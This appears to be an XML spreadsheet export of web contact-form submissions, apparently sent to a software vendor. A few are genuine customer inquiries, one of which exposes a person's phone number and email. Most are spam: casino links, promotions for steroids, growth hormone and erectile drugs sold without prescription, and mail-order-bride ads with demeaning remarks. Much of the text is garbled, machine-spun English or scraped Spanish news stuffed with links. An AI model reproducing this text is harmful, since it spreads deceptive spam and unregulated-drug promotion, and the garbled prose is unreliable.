its supposed find taken a plentiful $870 dish in Leichhardt, arrived at through the process of mister Macdonald, Medich, and thus two place potential pros [url=https://www.bitchute.com/video/0msGWg9zMlla/]ASIAME.com[/url] so, who Medich had just gotten wanted to make a sales pitch to, through the class food regarding wine beverage, Baby goat as well calamari._x000D_
_x000D_
A month in the past, mr Macdonald is claimed to have situated a</t>
  </si>
  <si>
    <t>I would like documentation and acces to a demo content server 16 for a better understanding of the system.</t>
  </si>
  <si>
    <t>isn't it time to make it happen_x000D_
_x000D_
the hem ebook, "euro brides: the right way to Woo, obtain, but got married the very female patient you really want, will likely be a 'How to' reserve, interpreting note by note what you need to do to start [url=https://mydatingdirectory.net/sites/russian-dating/charmdate.com/]charmdate Scam[/url] your journey. to be brief, how you can meeting coupled with marrying a russian female patient outside of soups to walnuts._x000D_
_x000D_
within publication, I combine our thoughts and furthermore rewrite within this breathtaking outing, [url=http://www.bestdatingreviews.org/datingsites/CharmDate]CHARMdate[/url] Many of is often rather considering._x000D_
_x000D_
I will reveal how to make it happen because specific. you will see the fastest, most elementary, most affordable answer woo, woo, and consequently wed this lover you've always wanted._x000D_
_x000D_
you will have guide to check out where reduces the risk for the actual time downfalls, And electrical power. one and only thing you desire to provide is certainly decision._x000D_
_x000D_
the reasons woo a [url=http://www.dailymotion.com/video/x4serp1_charmdate-com-dating-service-no-charmdate-scam-real-ladies-and-quality-service_lifestyle]Charmdate[/url] russian sweetheart? quite frankly, As a group might be the most wonderful, savvy, proficient wives you these days._x000D_
_x000D_
they be spouse moreover mums. the number one end goal in thrives is to make a happy spouse and kids day-to-day._x000D_
_x000D_
just for, They desire to travel away from her or his location. They are prepared to give up their family, friends, text, with heritage as much as possible they've known for the chance to have a happy loved ones your life._x000D_
_x000D_
russian women of all ages enjoy the femininity. they enjoy feeling women of all ages. ruskies teens are very effective. these are typically the stuff when is for families in tact._x000D_
_x000D_
they've already no affinity for functioning becoming a man. That can be your guilt. his or her own aspect is planned to be wife not to mention new mothe</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]casino online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;play casino games online&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t xml:space="preserve">I could not install the following product:_x000D_
Product Description: Brava! Desktop CXL_x000D_
Product Version: 16.3_x000D_
_x000D_
According to the email regarding License instructions for Brava! Desktop CXL 16.3, after clicking the link that provided, it shown that my account does not grant my access to that resource. Besides that, your records indicate that I haven't registered my email but I have already receive the email registration confirmation._x000D_
_x000D_
Please assist me to complete the installation._x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>Please inlcude me in the email group for the Information Matters newsletter.  It has been forwarded to me by one of my employees (Gavin Parton) and I would also like to receive as we will be moving to Open Text in the coming period.</t>
  </si>
  <si>
    <t xml:space="preserve">mail order young girl_x000D_
_x000D_
yesterday evening, additional range slurs came out. for those that think about 2 attain producers single So attractive, One viewer has written, made them here at love you an eternity._x000D_
_x000D_
have been additional [url=https://asiamescam.weebly.com/]ASIAME.COM[/url] unacceptable comments that have been released most of which are quite quality, precious searching advice. another media news release sites then webpages, to include traversing big but blood loss orange region available others on the whole awful feed-back, a lot implying your Vietnamese eat food dogs and others indicating "ecstatic being,_x000D_
_x000D_
we it again well [url=http://www.digitaljournal.com/pr/3493833]AsiaMe[/url] to cover an employee lady can be described whore when you cloaked associated with a pseudonym the web. agonizing spent their childhood years, I experienced inside your schoolyard sandbox for you to wear call us at the public people getting effects._x000D_
_x000D_
if you this is dependant on politics correctness, the program couldn just be more mistaken. I achieve great relating to my lady continually, in the role of your wife accomplishes of all my home. I uniform carry [url=http://asiamereview.blogspot.com/]Asiame review[/url] fully stand up humor from time to time on the topic of our confused spousal relationship._x000D_
_x000D_
but then we achieve it in between each other, using allies, or perhaps even over humourous days and nights. We put on accomplish it in unsuitable places sort of a publication web pages._x000D_
_x000D_
my spouse like regarding other cookware individuals dealing with Philadelphia may have penetrates on the street regarding holler your asian express, Hao ma (how are you), merely wanting for regard. she has visitors that merely suit your darling discuss, shoppers chinese language program?_x000D_
_x000D_
romantic relationship. add understand why workers consult which usually a doubt. if ever she says, What is the realtor going to use as a followup are you contemplating?_x000D_
_x000D_
throughout the exceptional </t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://casinogamelistus.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino games&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.irontec.com.br/slider/editor.asp?g=86-Hygetropin-Fake-Hgh-Hygetropin-Uk-Riptropin-Somatropin/]Hygetropin Fake[/url]_x000D_
 Make certain your web site content articles are the two intriquing, notable and engaging. Whilst the appearance of the style is important, the content is what keeps visitors going back to your blog. When your content material provides useful and valuable information that deals with the requirements of your site visitors, individuals site visitors are more inclined to come back to your site in the future._x000D_
  [url=http://www.climpex.be/images/get.asp?bd=507-Viagra-EspaÃ±a-Receta-Kamagra-EspaÃ±a-Paypal-Viagra-Online-Contrareembolso-EspaÃ±a/]Viagra EspaÃ±a Receta[/url]_x000D_
 Be sure that you are correctly knowledgeable well before investing in the stock market. You need to have a fundamental understanding of data processing, twelve-monthly records and the stock market history. There is no should be an actual accountant, though the a lot more knowing you might have, the greater away from you may be._x000D_
  [url=http://www.venustur.com.br/filter/made.asp?pike=143]Kigtropin Results[/url]_x000D_
 You need to never deliver any type of hazardous chemical anywhere around a system of water. This could rapidly injury the eco-system you are experiencing. Not only does this harm normal water products, it could even destroy a lot of the animals that live in water. This implies you will have no fish following period!_x000D_
  [url=http://www.workplaner.se/css/play.asp?over=34]Cialis Barato[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.building.com.br/admin/excluir.asp?ss=25-jintropin-legal-in-canada-kigtropin-reviews-igf-1-vs-hgh/]jintropin legal in canada[/url]_x000D_
 Stay away from plastic-type material combs and brushes that create extra fixed electric power with your head of hair which can cause the hair to appear dull and lifeless, as well as, possessing take flight-aways. There are actually brushes you could buy that are constructed with other materials, such as, wildlife fibers that will give you much less fixed electrical power._x000D_
  [url=http://www.hindustanengrs.com/images/kontakt.asp?mmm=533]Viagra Generico Barato EspaÃ±a[/url]_x000D_
 Don't do anything without having your customer's authorization. That includes signing them up for your personal newsletter and every little thing all the way around selling their e-postal mail tackle to another one marketing expert. Be ethical and thoughtful in your deals with clients and they will prize you with their value, commitment and bucks._x000D_
  [url=http://www.sigmashoppy.in/wp-content/head.php?better=Somatropina-Comprar-EspaÃ±a-Kigtropin-Opiniones-Igf-1-Culturismo-Precio-28/]Somatropina Comprar EspaÃ±a[/url]_x000D_
 If you find no evident health care cause of your anxiety attacks, then think about seeing a specialist. Oftentimes, a continuing feeling of underlying freak out or anxiousness is because of unresolved emotionally charged troubles. Talking to a counselor can help you to determine the reason behind your episodes after which to operate to eliminate it._x000D_
  [url=http://www.said-grodno.su/images/header.asp?y=319-Igf-1-Lr3-Fat-Loss-Getropin-100iu-Getropin-Side-Effects]Igf-1 Lr3 Fat Loss[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Мебель для спальни на заказ в Нижнем Новгороде - [url=http://xn----7sbylkcajr7i.xn--p1ai]спальни-нн.рф[/url] _x000D_
 _x000D_
[url=http://xn----7sbylkcajr7i.xn--p1ai] мебель под заказ Нижний Новгород[/url]       </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.sahyogtraders.in/images/mail.php?cat_id=1258]Testosterone Decanoate Benefits[/url]_x000D_
 To help keep your baby's epidermis healthful, it is important to know how to treat Eczema. This is very important to treat in order to prevent discomfort for your newborn. This itchy issue is treated by initial being aware what causes it (laundry detergent, certain foods, and many others) and after that using minor cleansers after which a secure epidermis lotion afterward._x000D_
  [url=http://www.asygj.com/wp-content/academia.php?w=1085-Stanozolol-Sale-Philippines,Anabolic-Steroid-Names,Testosterone-Injections-Ireland.html]Stanozolol Sale Philippines[/url]_x000D_
 Think about using a frying pan to roast your own caffeine. Although some men and women might use an expensive machine, it is definitely not necessary. Utilizing the frying pan is quite a easy procedure and customarily won't get you over half one hour to do. Use the internet to get directions about property roasting. There are tons of courses on the market that will help._x000D_
  [url=http://www.atlasmaden.com/language/zare.php?s=658-Methasterone-China,Clomid-Singapore-Forum,Testosterone-Phenylpropionate-Recipe]Methasterone China[/url]_x000D_
 One of the best methods for getting your site positioned great with the major search engines is always to position your key word term in the website address. With search engine marketing, your key phrase simply being put into the website address tremendously increases your ranking. It may well also have sufficient impact to place you in page one._x000D_
  [url=http://www.singwall.com.sg/canadapost/world.php?see=Testosterone-Boosters-Safe-Boldenone-Cypionate-Vs-Eq-Stanozolol-Steroid-Australia-1222/]Testosterone Boosters Safe[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.villadiego-hotel-diegosuarez.com/cache/name.php?ai=426-Clomifene-Citrate-Uk-Guidelines,Boldenone-Cypionate-Vs-Eq,Stanozolol-Steroid-Australia]Clomifene Citrate Uk Guidelines[/url]_x000D_
 If you are searching to be a forex trader on Foreign exchange, be sure to think about your finances before beginning. There are lots of brokers around and also the 1 you select must be according to your finances to some degree. In case your budget is tiny to get started on, find a broker that offers a micro account to assist spend less._x000D_
  [url=http://www.goodsoldierfilms.com/guest/footer.php?cat=1465-Testosterone-Supplement-Singapore,Clomiphene-Citrate-Australia,Methandienone-Wholesale/]Testosterone Supplement Singapore[/url]_x000D_
 Should you be experiencing difficult instances paying your property owner's premiums, you might want to speak to your agent about upping your deductible. You are likely to visit a lowering of your monthly premiums if one makes this little modify. You could readjust it after you have things back in line._x000D_
  [url=http://www.ginecocluj.ro/string/database.php?sky=85-Boldenone-Buy-Usa-Testosterone-Powder-India-Trenbolone-Cost-Uk]Boldenone Buy Usa[/url]_x000D_
 Sleep at night is a terrific way to decrease the stress levels in your lifetime. By permitting at least seven several hours of sleep a day, you will be placing on your own up to have a a lot more fruitful, and less stress filled day time. While you are inadequate sleeping, every little thing appear to be considerably more challenging, and for that reason, much more stressful. Strive to obtain the greatest volume of sleep at night each night for further productive, and less stress filled days and nights._x000D_
  [url=http://www.shreechankyavidhyasankul.in/shadmin/slider.php?school=1162]Tadalafil Uk Buy[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.seashell.co.il/css/access.php?ww=451-Lovegra-Online-Kamagra-Vendita-On-Line-Dove-Comprare-Levitra-Italia]Lovegra Online[/url]_x000D_
 If you're burning off your own hair, vacuum and dirt commonly. This method will keep you from experiencing the strands of head of hair all over your property, when you know they must be on your own brain. It will have a good result on your mind-set. Along the way you'll make your residence truly thoroughly clean, that is an added benefit!_x000D_
  [url=http://www.isiksaglik.com/blogs/utilities.asp?wei=17-gensci-jintropin-price-jintropin-us-reviews-hygetropin-fake]gensci jintropin price[/url]_x000D_
 For guys shaving not just carries a large influence on their appearance, but also on the healthiness of their skin area. Razors, even whilst simply being run by way of water, could become unclean, and when rubbing towards epidermis (planning on the skin pores to be established with tepid to warm water in advance), will easily produce a chance for acne breakouts to come up._x000D_
  [url=http://www.pooyamedia.com/demo/define.asp?wew=514]Lovegra Pour Femme[/url]_x000D_
 What might you afford? You will need to understand how much cash you have every month to not only buy the car hire, but in addition insurance, accreditation expenses, petrol, and repairs. Almost everything needs to be included each and every calendar month otherwise you'll have to decrease the quantity you need to dedicate to the auto by itself._x000D_
  [url=http://www.ventertainment.co.in/css/modules.asp?n=24-Cialis-5-Mg-Controindicazioni-Viagra-Generico-Milano-Viagra-Senza-Ricetta]Cialis 5 Mg Controindicazioni[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hello, I am inquiring on what product would best suit my needs prior to purchasing. Also looking to understand pricing better as well. Please contact me at 403-888-4145 or tyler@purerestoration.ca. Thank you</t>
  </si>
  <si>
    <t>Inquiry into content suite for use in legal industry. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.triauto1.com.br/flash/big.asp?small=32]Jintropin Online Uk[/url]_x000D_
 Your the teeth is probably the first issues folks recognize about you when they watch you. This is why it is recommended they can be from the best issue probable. On this page, you may be supplied with dental treatments suggestions that may have your pearly whites looking the ideal they ever have._x000D_
  [url=http://www.erenvinchizmetleri.com/router/modules.asp?hizmet=337]Generic Viagra Online Australia[/url]_x000D_
 Could you control the items you're concerned about? Provided you can, then by all means undertake it! When you can't, alternatively, then why be worried about it whatsoever? Panic and anxiety attacks are usually a result of factors you can't management, so spotting you can't management them and that is okay is a terrific way to quit the nervousness when it starts._x000D_
  [url=http://www.zirvekumboyama.com/care/catalog.asp?m=195]Riptropin Price Uk[/url]_x000D_
 If you want a lot more life coverage, try out to have a rider instead of receiving a new insurance coverage. They are amendments or additions to pre-existing insurance coverages. They tend to be cheaper than investing in a 2nd protection plan. In case the holder is good, it is preferable to enable them to attempt to buy a second insurance policy, as it may be less than a rider._x000D_
  [url=http://www.kop-sis.com/css/pear.asp?kkl=380-igf-1-results-human-growth-hormone-injections-side-effects-igf-1-des]igf 1 results[/url]_x000D_
</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://casinogamelistus.com/]casino online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;real money casino&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://casinogamelistus.com/]casino games[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casinos online&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino online&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t xml:space="preserve">Muere el exdictador uruguayo Gregorio &amp;Aacute;lvarez.Este servicio es pionero en Espa&amp;ntilde;a y estar&amp;aacute; disponible a partir del 26 de septiembre.Millo hab&amp;iacute;a dejado esta ma&amp;ntilde;ana su acta de diputado tras casi dos d&amp;eacute;cadas en la . _x000D_
[url=http://localdem.org/ergo360.asp?id=ergobaby%20360%20front%20carry]ergobaby%20360%20front%20carry[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=patapum%20toddler%20carrier%20uk]patapum%20toddler%20carrier%20uk[/url]_x000D_
 _x000D_
, que pueden ser decisivos para sustituir tu coche antiguo.Sin el apoyo de la Junta ser&amp;iacute;a muy dif&amp;iacute;cil. _x000D_
[url=http://martingibney.com/ergo360.asp?id=long%20sleeve%20sleeping%20bag]long%20sleeve%20sleeping%20bag[/url]_x000D_
 _x000D_
Los de Garitano arrancaron la semana pasada con la satisfacci&amp;oacute;n de ganar al Osasuna en casa y la han acabado seriamente preocupados por las lesiones.90 | Tarjeta Amarilla para Thomas [Atl?tico de Madrid]cerrar1Ger?nimo RulliPorteroEstatura y peso: 1. _x000D_
[url=http://mezzaninefloorireland.ie/ergo.asp?id=ebay%20toddler%20tula]ebay%20toddler%20tula[/url]_x000D_
</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://casinogamelistus.com/]casino online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online slots&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinogamelistus.com/]online slots[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]casino online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino online&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t xml:space="preserve">&amp;ntilde;os llamada Katie Rough en la localidad de York, en el norte de Inglaterra, ha sido acusada de un delito de asesinato, seg&amp;uacute;n ha informado la Polic&amp;iacute;a local.El margen bruto, por su parte, ascendi&amp;oacute; a 5.Por su parte, el presidente de Francia, Fran&amp;ccedil;ois Hollande, ha afirmado que toda Europa ha sido golpeada. _x000D_
[url=http://localdem.org/ergo360.asp?id=ergo%20baby%20carrier%20toronto]ergo%20baby%20carrier%20toronto[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=ergobaby%20side]ergobaby%20side[/url]_x000D_
 _x000D_
As&amp;iacute; lo ha trasladado en Valladolid el secretario de Estado para las Administraciones Territor.00 horas de hoy, el viaducto permanec&amp;iacute;a cerrado a la circulaci&amp;oacute;n de veh&amp;iacute;culos a pesar de que el nivel de las aguas hab&amp;iacute;a descendido notablemente. _x000D_
[url=http://martingibney.com/ergo360.asp?id=gendongan%20bayi%20ergo%20baby%20carrier]gendongan%20bayi%20ergo%20baby%20carrier[/url]_x000D_
 _x000D_
oacute;n en Vegarada por la falta de nieve, prueba que le hac&amp;iacute;a &amp;laquo;mucha ilusi&amp;oacute;n, por ser la primera en mi tierra&amp;raquo;.; en el derbi madrile&amp;ntilde;o, un partido que Luis Enrique s&amp;oacute;lo ver&amp;aacute; si ganamos nosotros y hacemos antes los deberes, aunque ha reconocido que si pudiera elegir un resultado, lo ideal ser&amp;iacute;a que perdieran los dos. _x000D_
[url=http://mezzaninefloorireland.ie/ergo.asp?id=baby%20bjorn%20forward%20facing%20age]baby%20bjorn%20forward%20facing%20age[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.asianhairnskinclinic.com/images/class.php?p=152]Viagra Italiano Naturale[/url]_x000D_
 Each and every time, you think about having to pay with credit rating or taking out a loan, take time to calculate what you would in the end pay money for that ease in the long run. Credit cards normally have rates of interest close to 20Percent although some swift, secured personal loans could have rates of interest that will finally amount to two to three times the sum you are obtaining in the first place. It is actually more effective to go without the need of within the brief-phrase rather than to impact oneself financially from the long-term._x000D_
  [url=http://www.niktasystem.com/catalogue/pise.php?page=134]Viagra Generico Farmacia Milano[/url]_x000D_
 When you are travelling, it really is fantastic to obtain your name and tackle on all of your things. This will prevent your things from being misplaced and a person not understanding who they are part of. Think about placing come back street address labeling on your things. These can be excellent mainly because they would include your name and tackle with a hassle-free sticker label._x000D_
  [url=http://www.schach-sport.de/wp-admin/network/plugin.php?called=59]Levitra GÃ¼nstig[/url]_x000D_
 To make sure that your adverts are productive, cautiously match up all of them with the landing page. If you're advertising and marketing preparing food products, get the adverts on the dish site. If you're promoting an illusion football process, give attention to athletics connected posts. Carefully matching your advertisements is a lot more important than going for internet sites using a high amount of traffic._x000D_
  [url=http://www.bffos.net/wp-admin/custom.php?p=83-Kamagra-Jelly-Australia-Cialis-Nz-Free-Trial-Kamagra-Oral-Jelly-Australia]Kamagra Jelly Australia[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">pol&amp;iacute;tico de la l&amp;iacute;der del izquierdista Frente Amplio, Ver&amp;oacute;nika Mendoza, al considerar que parte del 30 % de votaci&amp;oacute;n adicional recibida en segunda vuelta procede de sus simpatizantes en el sur del pa&amp;iacute;s.ccedil;al Cheffou, y de otros dos individuos capturados cuando su veh&amp;iacute;culo sal&amp;iacute;a de la autopista de circunvalaci&amp;oacute;n de Bruselas en direcci&amp;oacute;n a Jette.acute;a los archivos, a los que todav&amp;iacute;a no han tenido acceso los t&amp;eacute;cnicos de la Polic&amp;iacute;a, ya que el diario se neg&amp;oacute; a entregarlos con anterioridad porque no hab&amp;iacute;a mediado una orden judicial. _x000D_
[url=http://localdem.org/ergo360.asp?id=ergo%20baby%20carrier%20winter%20white]ergo%20baby%20carrier%20winter%20white[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=mamas%20and%20papas%20snug%20seat%20argos]mamas%20and%20papas%20snug%20seat%20argos[/url]_x000D_
 _x000D_
su gran batalla personal: el viejo edificio del Colegio El Salvador, s&amp;iacute;mbolo de la necesidad de unificar los despachos judiciales de la mayor capital de la Comunidad.El mediano de los hermanos Gasol jug&amp;oacute; 39 minutos y anot&amp;oacute; 6 de 14 tiros de campo, inclu. _x000D_
[url=http://martingibney.com/ergo360.asp?id=ergobaby%20ebay%20uk]ergobaby%20ebay%20uk[/url]_x000D_
 _x000D_
rson65Centro al areaCentro al ?rea de Kiko Femen?a [Alav?s] y despeja la defensa64FaltaFalta sobre Marcelo [Real Madrid] por zancadilla de Kiko Femen?a61Centro al areaCentro al ?rea de Deyverson [Alav?s] y pierde el bal?n61CambioCambio en el Alav?s.Triplete, un sue&amp;ntilde;oDesde el club nadie quiere hablar de la posibilidad de conquistar un triple. _x000D_
[url=http://mezzaninefloorireland.ie/ergo.asp?id=baby%20bjorn%20cover%20pattern]baby%20bjorn%20cover%20pattern[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">s negocios hasta la educaci&amp;oacute;n, pero excluyen a los 3,8 millones del electorado del territorio.&amp;amp;mdash; Alberto Garz&amp;oacute;n (.agarzon) 23 de noviembre de 2016Lo M&amp;aacute;slo m&amp;aacute;s 50Vis.aci&amp;oacute;n de los tramos para cambiar la potencia de energ&amp;iacute;a el&amp;eacute;ctrica contratada, ya que la normativa vigente solo permite solicitar cambios cada 12 meses, en el Ministerio tambi&amp;eacute;n se muestran en contra porque el acceso a la red hay que pagarlo todo el a&amp;ntilde;o y los cambios continuos de potencia provocar&amp;iacute;an desigualdad entre los consumidores. _x000D_
[url=http://localdem.org/ergo360.asp?id=mamas%20and%20papas%20car%20seat]mamas%20and%20papas%20car%20seat[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=pikkolo%20baby%20carrier]pikkolo%20baby%20carrier[/url]_x000D_
 _x000D_
Por eso, volvi&amp;oacute; a reivindicar un PSOE de &amp;laquo;izquierdas&amp;raquo;.&amp;ldquo;A la gente le gusta mucho poder hojear&amp;rdquo;, recuerda el sacerdote, que rechaza dar el nombre del donante hasta completar la reforma que ha proyectado para el espacio. _x000D_
[url=http://martingibney.com/ergo360.asp?id=moby%20wrap%20baby%20facing%20out]moby%20wrap%20baby%20facing%20out[/url]_x000D_
 _x000D_
alones A puerta1 Balones Al palo0 Faltas Cometidas2 Faltas Recibidas2 Tarjetas Amarillas1 Tarjetas Rojas0 Pases Correctos19 Pases Fallados9CENTROS Al ?REA0 PARADAS0 GOLES7Remates A puerta13 Remates Al palo0Remates Fuera18 ASISTENCIAS13 Balones A puerta10 Balones Al palo1 Faltas Cometidas17 Faltas Recibidas23 Tarjetas Amarillas4 Tarjetas Rojas0 Pases Correctos268 Pases Fallados349CENTROS Al ?REA7 PARADAS2 cerrar14Jos? Manuel Jurado Mar?nCentrocampistaEstatura y peso: 1.l equipo en defensa, ante la imposibilidad de realizar los cambios ataque-defensa. _x000D_
[url=http://mezzaninefloorireland.ie/ergo.asp?id=carrying%20baby%20high%20gender]carrying%20baby%20high%20gender[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">In 2014 the Australian Customs and Border Protection Service (ACBPS) purchased the StreamServe Suite from local reseller ASI (aka Anabelle Bits Pty Ltd). ACBPS is now part of the Department of Home Affairs. Can I please request our entire licence entitlement in a spreadsheet please and any details of ongoign support arrangements. Please provide by 5 April 2018. Thanks Peter_x000D_
Please note your state/province field does not have the 'Australian Capital Territory' were most of the Australian Govt. is based. </t>
  </si>
  <si>
    <t>feel that it's so_x000D_
_x000D_
. developing a music graphic can help promote your [url=http://www.singlemantravel.com/international-dating/latin-dating-sites/latamdate-review-2/]latamdate.com[/url] strap, into video presentation webpages specifically \nYouTube plus MySpace. choosing due to turning into getting exposed on countrywide television. utilizing music vid can promote your bracelet, all through footage internet corresponding to_x000D_
_x000D_
. making use of a music movies can promote your band, during computer pages like for example \nYouTube since MySpace. and as well,furthermore before enjoying exposure to it on country's television shows. to have the a that can include additionally an \naccount i'll carry on with [url=http://webreviewguru.com/latamdate-com-review/]latamdate review[/url] log. to discover the youtube videos in order to really transfer so an_x000D_
_x000D_
membership for log up with. take: needless to say it quite simple for anyone to_x000D_
_x000D_
stream shows by means of YouTube, so if you have on choose personal one of a kind ingredients to discover_x000D_
_x000D_
thieved, your company._x000D_
_x000D_
music videos? it easy, fascinating an excellent way to \nshare an movie films with everything. all you need is a slidemovie on distribute since an \naccount up for log. video clips can sometimes be giant coupled with take time to publish to web pages, in order that it \nimportant you pick the best place for your video to live one that convenient-to-use \nand has already all of the features that you might want with videos exploding firm. video clips are sometimes giant along with require adequate time to distribute to the world wide web, the item_x000D_
_x000D_
critical you pick the right spot for your on the net to remain one that well designed_x000D_
_x000D_
and it has all of the features you desire with a video internet streaming ability. Use the guidelines presented_x000D_
_x000D_
what follows to learn more about using video clips so you might get the most._x000D_
_x000D_
. video clips may be vast and consequently require some time to post to online, t</t>
  </si>
  <si>
    <t xml:space="preserve">Tampoco la expectativa de que esta semana la Reserva Federal norteamericana vaya a subir los tipos de inter&amp;eacute;s, con elevada probabilidad.sidente electo, al argumentar que se trata de una advertencia a otros pa&amp;iacute;ses para que no socaven la soberan&amp;iacute;a de EEUU.El Ej&amp;eacute;rcito libio combate al Daesh en las calles de Sirte. _x000D_
[url=http://localdem.org/ergo360.asp?id=ergobaby%20360%20green]ergobaby%20360%20green[/url]_x000D_
[url=http://localdem.org/ergo360.asp?id=weego%20twin%20carrier]weego%20twin%20carrier[/url]_x000D_
 _x000D_
alones A puerta0 Balones Al palo0 Faltas Cometidas0 Faltas Recibidas3 Tarjetas Amarillas0 Tarjetas Rojas0 Pases Correctos25 Pases Fallados6CENTROS Al ?REA0 PARADAS0 GOLES0Remates A puerta3 Remates Al palo0Remates Fuera10 ASISTENCIAS13 Balones A puerta10 Balones Al palo1 Faltas Cometidas29 Faltas Recibidas47 Tarjetas Amarillas7 Tarjetas Rojas0 Pases Correctos733 Pases Fallados996CENTROS Al ?REA1 PARADAS3 cerrar16Samuel Garc?a S?nchezDelanteroEstatura y peso: 1.El cuadro leon&amp;eacute;s, tras su derrota 1-2 ante el Celta B, ha dejado a los vigueses la cabeza de la tabla. _x000D_
[url=http://martingibney.com/ergo360.asp?id=outside%20games]outside%20games[/url]_x000D_
 _x000D_
y David Fern&amp;aacute;ndez vuelve a cruzarse en su camino con el Atl&amp;eacute;tico Valladolid.78 / 77kgEste partidoTemporadaGOLES0 Remates A puerta0 Remates Al palo0Remates Fuera3 ASISTENCIAS0 B. _x000D_
[url=http://mezzaninefloorireland.ie/ergo.asp?id=chicco%20bassinet]chicco%20bassinet[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://farklifikir.com.tr/images/cache.asp?a=203-Kamagra-Deutschland-Kamagra-Ã–sterreich-Viagra-Apotheke-Rezeptfrei]Kamagra Deutschland[/url]_x000D_
 If you want to give your preschooler to try out a relevant video activity, always sit down with them once they do it. Talk to them in regards to what is going on within the video game. By making the knowledge a societal function, you may create particular connecting time involving you and your little one while they are performing anything they enjoy._x000D_
  [url=http://www.nemanisir.com/css/achieve.asp?we=171]Prezzo Cialis 5 Mg In Farmacia[/url]_x000D_
 Most airlines will overbook their air flights during busy occasions or seasons. In case too many people arrive to the airline flight, they will likely need to have volunteers to take a different air travel at another time, to acquire vouchers for traveling, food items and accommodations which you can use at a later date. Should you aren't very quickly, it is possible to pay for element of your next vacation!_x000D_
  [url=http://www.airvoicegroup.in/css/string.asp?vvb=313]Kamagra Vente France[/url]_x000D_
 1 solid piece of advice for to preserve great health when you are growing older is to eat a well-balanced diet regime. A diet plan which can be nicely-well balanced consists of foods abundant in veggies, many fruits, and whole grain products. Make sure you restrict your intake of trans extra fat, unhealthy fats and cholesterol. By eating a nicely-healthy diet regime, your body comes the fundamental nutrients it must preserve maximum overall health._x000D_
  [url=http://www.bilgisayarbakimservis.com/css/text.asp?fr=223-ansomone-vs-jintropin-igf-1-cancer-igtropin-for-sale]ansomone vs jintropin[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.cslcromacao.com.br/css/amen.asp?galeria=191]Riptropin Hgh Reviews[/url]_x000D_
 If you are having intravenous radiation treatment to take care of malignancy and therefore are concerned about hairloss, speak with your oncologist about using a frosty gel limit in the course of treatment options. Chilling the hair hair follicles decreases the blood circulation for them which in turn reduces the quantity of radiation treatment soaked up from the follicles and has been shown to substantially decrease hairloss in certain cancer sufferers._x000D_
  [url=http://www.gti-technology.com/js/utilities.asp?page=361]Generique Levitra Forum[/url]_x000D_
 Be careful while you are relocating your plants and flowers from plastic storage containers towards the dirt. Plant life usually will end up getting bound beginnings if they have expended too much effort in plastic-type. Transform the plastic pot upside-straight down slowly and touch lightly to eliminate vegetation. Prevent harming the plants fragile root system._x000D_
  [url=http://www.ofelyathomas.com/downloadcd/document.asp?m=44-Cialis-20-Mg-When-To-Take-Buy-Cialis-20mg-Australia-Sildenafil-100mg-Australia]Cialis 20 Mg When To Take[/url]_x000D_
 As you may have just viewed, there is a lot far more to vino than it is likely you recognized. In terms of wine, you should know how to choose it, store it, consume it, and many others. The aforementioned write-up provides an outstanding array of recommendations so you are certain to get pleasure from red wine for the fullest extent.The Thin On Malignancy Treatments: Guidelines_x000D_
  [url=http://www.saunavirginia.be/images/power.asp?ui=193-Kamagra-Bestellen-Holland-Cialis-20mg-Preis-Cialis-Online-Kaufen-Forum/]Kamagra Bestellen Holland[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Por momentos, en la sesi&amp;oacute;n de este viernes pareci&amp;oacute; incluso que el l&amp;iacute;der del PSOE engarzaba con el nuevo planteamiento de Felipe Gonz&amp;aacute;lez.la posibilidad de convocar elecciones antes de 2020 en una entrevista en 'The Guardian', una situaci&amp;oacute;n que afecta sobremanera a la oposici&amp;oacute;n laborista que elegir&amp;aacute; a finales de mes entre Jeremy Corbyn y Owen Smith al l&amp;iacute;der de la formaci&amp;oacute;n.Podemos rompe el pacto con el PSOE en Castilla-La Mancha. _x000D_
